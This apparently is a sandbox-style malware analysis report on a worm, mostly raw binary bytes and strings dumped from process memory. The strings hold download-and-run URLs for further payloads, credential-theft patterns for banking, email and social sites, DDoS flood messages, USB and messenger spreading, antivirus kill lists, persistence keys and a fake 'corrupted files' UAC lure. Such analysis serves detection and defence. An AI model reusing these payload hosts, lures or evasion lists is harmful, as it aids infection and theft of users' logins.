..text............................... ..`.rdata..@:.......<........
..........@[email protected]...`........ [email protected]....[......
.\..................@..@..............................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U......E."....E.Q...
.E.6....E.c....E.C......A.;E.}..M...0.U. ..U....A...R.M. ..M..U.3U..U.
.E...]................U......E.*....E.-....E.:....E.Q....E.%....E.R...
...A...6.M. ..M..U....A..L......A..U...7...A. ....A..M..M.....A. .....
A..E..E..E..E...].........U......E.J....E.b....E......E......E. ....E.
.......E.....E..}..}W.}.E}[email protected]....@.
[email protected]. ..M....U.3U..U..E...].........U......E
.9....E.=....E./[email protected]. ..M.....A.R...A.P...

<<< skipped >>>

The Worm connects to the servers at the folowing location(s):

%original file name%.exe_1312:

.text

`.rdata

@.data

__MSVCRT_HEAP_SELECT

user32.dll

WinExec

KERNEL32.dll

ADVAPI32.dll

SHELL32.dll

URLDownloadToFileA

urlmon.dll

GetCPInfo

http://91.188.117.157/bnew.exe

ascawd.exe

http://54.193.9.202/dqnew.exe

f3ed.exe

http://91.238.134.77/bet.exe

dfwef.exe

http://54.183.79.85/spm.exe

fsdgs.exe

http://54.193.9.202/ng.exe

fdsfifew.exe

c:\%original file name%.exe

%original file name%.exe_1312_rwx_00400000_00009000:

.text

`.rdata

@.data

__MSVCRT_HEAP_SELECT

user32.dll

WinExec

KERNEL32.dll

ADVAPI32.dll

SHELL32.dll

URLDownloadToFileA

urlmon.dll

GetCPInfo

http://91.188.117.157/bnew.exe

ascawd.exe

http://54.193.9.202/dqnew.exe

f3ed.exe

http://91.238.134.77/bet.exe

dfwef.exe

http://54.183.79.85/spm.exe

fsdgs.exe

http://54.193.9.202/ng.exe

fdsfifew.exe

c:\%original file name%.exe

%original file name%.exe_1312_rwx_00D80000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

c:\%original file name%.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\%original file name%.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

svchost.exe_1340:

.text

`.data

.rsrc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

RPCRT4.dll

NETAPI32.dll

ole32.dll

ntdll.dll

RegCloseKey

RegOpenKeyExW

GetProcessHeap

NtOpenKey

svchost.pdb

\PIPE\

Software\Microsoft\Windows NT\CurrentVersion\Svchost

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

5.1.2600.5512 (xpsp.080413-2111)

svchost.exe

Windows

Operating System

5.1.2600.5512

%original file name%.exe_1312_rwx_00FD0000_00027000:

.text

`.rdata

@.data

.rsrc

@.reloc

PSSSSSSh

PSSVSSh

RPVSSh

PSSh(

PSSh#

PSSh'

PSSh&

PSSh*

9p.uV

%original file name%.exe_1312_rwx_00FF8000_0006D000:

Opera/9.00 (Windows NT 5.1; U; en)

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)

Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)

Opera 9.4 (Windows NT 6.1; U; en)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)

SbieDll.dll

Software\Classes\CLSID\%s\X

Software\Classes\CLSID\%s\X\%s

0xX

SB:0xX

G:%s_0xX_%c:%s_v1$

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u

IEXPLORE.EXE

IE.HTTP

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

IE.HTTPS

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice

IE.AssocFile.HTM

HTTP\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s

Psapi.dll

%s\%s

Software\Adobe\Acrobat Reader\%s\Privileged

mscoree.dll

HARDWARE\DESCRIPTION\System\CentralProcessor\%u

SOFTWARE\Microsoft\Windows NT\CurrentVersion

nspr4.dll

nss3.dll

Urlmon.dll

URLDownloadToFileW

Netapi32.dll

76487-640-1457236-23837

76487-337-8429955-22614

76487-644-3177037-23510

76497-640-6308873-23835

55274-640-2673064-23950

76487-640-8834005-23195

76487-640-0716662-23535

76487-644-8648466-23106

00426-293-8170032-85146

76487-341-5883812-22420

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup

{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}

snxhk.dll

comctl32.dll

ZwSetValueKey

ZwDeleteValueKey

SOFTWARE\%s

update.microsoft.com

microsoft.com

windowsupdate.microsoft.com

JOIN

PRIVMSG

.rdata

cmd_option.%s

/c %s

cmd.exe

msvcrt.dll

--x-x-x-xx

Content-Type: multipart/form-data; boundary=x-x-x-xx

Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"

%s?action=up&g=%s

xul.dll

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

?pid=%d

?page=%d

?id=%u

%s=%u&%s=%s

%s=%s&%s=%u

&%s=%s

&%s%u=

&%s%hu=

&%s=_%u

%d|%s|%s|%s

.info

httpget

GET /%s HTTP/1.1

Host: %s

Content-Length: %d

Accept: %s

Accept-Language: %s

Accept-Charset: %s

Accept-Encoding: %s

User-Agent: %s

Referer: %s

Connection: %s

http://

iexplore.exe

firefox.exe

tbb-firefox.exe

%s:%hu

windowsupdate

SSH2_MSG_KEXINIT

SSH2_MSG_DISCONNECT

SSH2_MSG_USERAUTH_SUCCESS

http://%s%s/image.php?id=%s

TaskDialogIndirect

http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535

ÐxX

ntdll.dll

kernel32.dll

secur32.dll

crypt32.dll

user32.dll

advapi32.dll

wininet.dll

shell32.dll

shlwapi.dll

ole32.dll

version.dll

sfc.dll

dnsapi.dll

ws2_32.dll

8"808]9|9

9%9 919<9

=(=/=6==={=

4 4?4^4}4

6o6g6r6w6

9 9$9(90949

.text

`.rdata

@.data

.rsrc

Invalid parameter passed to C runtime function.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

EnumDesktopWindows

SetWindowsHookExA

SetProcessWindowStation

SetWindowsHookW

UnregisterHotKey

ExitWindowsEx

GetAsyncKeyState

EnumWindows

GetKeyState

USER32.dll

SHELL32.dll

RegCloseKey

RegQueryInfoKeyA

RegOpenKeyExW

RegOpenKeyExA

RegCreateKeyW

RegCreateKeyA

ADVAPI32.dll

GDI32.dll

SHLWAPI.dll

GetProcessHeap

GetCPInfo

KERNEL32.dll

i%fOLK

>Z.DI

Q}.UbU

%S.Ny

J[ÿF

#Q.RP

[.ivH

|:v%X

ym.sg

X*.x.aVkyJ1

.Po7VE

M%Doz

,v.XS

Software\Classes\CLSID\%S

G:%S_0xX

chrome.exe

opera.exe

safari.exe

maxthon.exe

:Mozilla\Firefox\Profiles

cookies.sqlite

%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*

%s\winsxs\%s\comctl32.dll

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s

%s:*:Enabled

avcuf32.dll

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

prstrui.exe

Windows Defender

MpClient.dll

Windows Defender\MSASCui.exe

MpSvc.dll

msseces.exe

MsMpEng.exe

MSASCui.exe

MpAsDesc.dll

MsMpLics.dll

avgui.exe

avgidsagent.exe

avgwdsvc.exe

avgdiagex.exe

avgmfapx.exe

avgupd.exe

avgcfgex.exe

avgnt.exe

avguard.exe

avshadow.exe

avcenter.exe

update.dll

updaterc.dll

usrreq.exe

ccsvchst.exe

symerr.exe

NIS.exe

NAV.exe

navw32.exe

avastui.exe

AvastEmUpdate.exe

ashUpd.exe

WRSA.exe

zatray.exe

ForceField.exe

updating.dll

fshoster32.exe

fsaua.dll

PSUNMain.exe

PSUAService.exe

PSANHost.exe

PSUNScan.dll

epavjobs.exe

AVENGINE.exe

Upgrader.exe

adaware.exe

BullGuard.exe.manifest

BullGuardUpdate.exe

BullGuard.exe

BullGuardScanner.exe

BullGuardBhvScanner.exe

BullGuardUpdate2.exe

BgScan.exe

BgScanEngine.dll

.manifest

updater.exe

Backup\RSD\RSSetup\updater.exe

RsTray.exe

RavMonD.exe

RsMgrSvc.exe

rsmain.exe

RsScan.dll

RsTray.dll

mbamgui.exe

mbam.exe

pctsGui.exe

pctsAuxs.exe

pctsSvc.exe

Update.exe

UpdateHlpr.dll

Definitions\vcore.dll

sbamui.exe

SBAMTray.exe

updater_client_mod.dll

FProtTray.exe

FPWin.exe

scf.dat

ALUpdate.exe

update_tmp.exe

arcaclean.exe

BavUpdater.exe

rcfp.exe

CLPSLA.exe

op_mon.exe

niu.exe

K7TSUpdT.exe

sguardxup.exe

ccupdate.exe

caupdate.dll

a2guard.exe

a2start.exe

a2service.exe

AVKTray.exe

GDSC.exe

AVK.exe

GDFirewallTray.exe

Bka.exe

BLuPro.exe

BkavSystemServer.exe

BkavService.exe

LiveUpdate.dll

LiveConnect.dll

BaseFile\Bkav\LiveUpdate.dll

V3Lite.exe

ASDSvc.exe

autoup.exe

downloader.exe

%s.config

updatesrv.exe

updatemgr.dll

egui.exe

ekrn.exe

x86\ekrn.exe

uWinMgr.exe

coreServiceShell.exe

uiSeAgnt.exe

uiWatchDog.exe

plugins\plugUpdater.dll

UiFrmwrk\uiUpdateTray.exe

coreFrameworkHost.exe

mcagent.exe

McSvHost.exe

McUICnt.exe

McPvTray.exe

mcui_exe

mcpltui_exe

mcshell.exe

mcupdmgr.exe

mcupdate.exe

mcshield.exe

mcupdui.dll

McAPExe.exe

.config

Image File Execution Options\%s

SYSTEM\CurrentControlSet\services\%s

%c:\ntusbdriver.sys

%c:\*p.exe

%c:\%s

p.exe

%WinDir%\explorer.exe

/C start /d. %s&"%s"

%COMSPEC%

%WinDir%\system32\shell32.dll

%c:\%s.lnk

VisthAux.exe

explorer.exe

t.minecraft

Works! PID: %d, Name: %s

cmdvirth

%s%s\X

tcp://

svchost.exe

csrss.exe

lsass.exe

smss.exe

wscript.exe

cscript.exe

vbc.exe

rundll32.exe

regsvr32.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

winlogon.exe

services.exe

%s\x.lnk

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s

desktop.ini

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

wintrust.dll

chrome.dll

Applications\iexplore.exe\shell\open\command

%s_xx

x.zip

Navw32.exe

SysInspector.exe

avscan.exe

mfefire.exe

wuauclt.exe

WerFault.exe

lFileZilla\sitemanager.xml

port

Sites.dat

Quick.dat

%s\3\%s

%s\4\%s

spoolsv.exe

steam.exe

skype.exe

origin.exe

dwm.exe

tapi3.dll

/C copy "%s" "%s"

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

Windows Update Service

"%s" /%s

Software\Microsoft\Windows\CurrentVersion\RunOnce

/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST

schtasks.exe

/DELETE /TN "Windows Update Check - 0xX" /F

\Windows\Explorer.exe

Low_X

%s.manifest

PendingFileRenameOperations

%s\X

Windows\CurrentVersion\Run

CurrentVersion\Windows

Windows NT\CurrentVersion\Image File Execution Options\%s

Windows has encountered a corrupted folder on your hard drive

Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.

Corrupted folder: %s

Corrupted file count: %d

%s

/c start "" "%s" /%s "%s"

shell32,ShellExec_RunDLL "%s" /%s "%s"

You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.

Windows 3.1 Update Service

%s:Zone.Identifier

%s\X.pif

KERNEL32.DLL

KERNELBASE.DLL

kernelbase.dll

1.2.3.4532

YandexDiskStarter.exe

Yandex.Disk

svchost.exe_1340_rwx_00090000_00029000:

.text

`.data

.rsrc

@.reloc

*windows defender*

*windowsupdate*

*drweb*

dwwin.exe

kernel32.dll

iphlpapi.dll

GetExtendedTcpTable

GetOwnerModuleFromTcpEntry

%systemroot%

%programfiles%\Common Files\*\*.exe

%appdata%\Identities\*.exe

%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe

ole32.dll

/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"

/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe

%SystemRoot%\system32\SHELL32.dll

%s\c731200

%s\%s

%s\%s.lnk

Windows_Shared_Mutex_231_c000100

ntdll.dll

\ScreenSaverPro.scr

\temp.bin

user32.dll

advapi32.dll

shell32.dll

urlmon.dll

wininet.dll

gdi32.dll

rpcrt4.dll

netapi32.dll

*.exe

.gonewiththewings

*.gonewiththewings

WinExec

URLDownloadToFileA

http://www.google.com

\calc.exe

\Reader_sl.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

notepad.exe

\notepad.exe

\svchost.exe

WindowsId

Identities\%s

%s\%s\%s.exe

:Zone.Identifier

.quarantined

"%s" -shell

"%s" -bind

userinit.exe

explorer.exe

Windows critical error, require reboot

Windows Update

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

GetProcessHeap

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyA

RegEnumKeyA

RegCreateKeyExA

RegOpenKeyExA

ADVAPI32.dll

ShellExecuteExW

SHELL32.dll

SetTcpEntry

SHLWAPI.dll

RPCRT4.dll

NETAPI32.dll

DNSAPI.dll

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Software\WindowsId Manager Reader

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\RunOnce

WindowsMark

m1xg.org

mxxtxxt.biz

meob.me

%System%\notepad.exe

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0A

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

%s_%d

-%sMutex

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

URLDownloadToFileW

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

Secur32.dll

ShellExecuteA

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

WS2_32.dll

MSVCRT.dll

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

RegNotifyChangeKeyValue

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

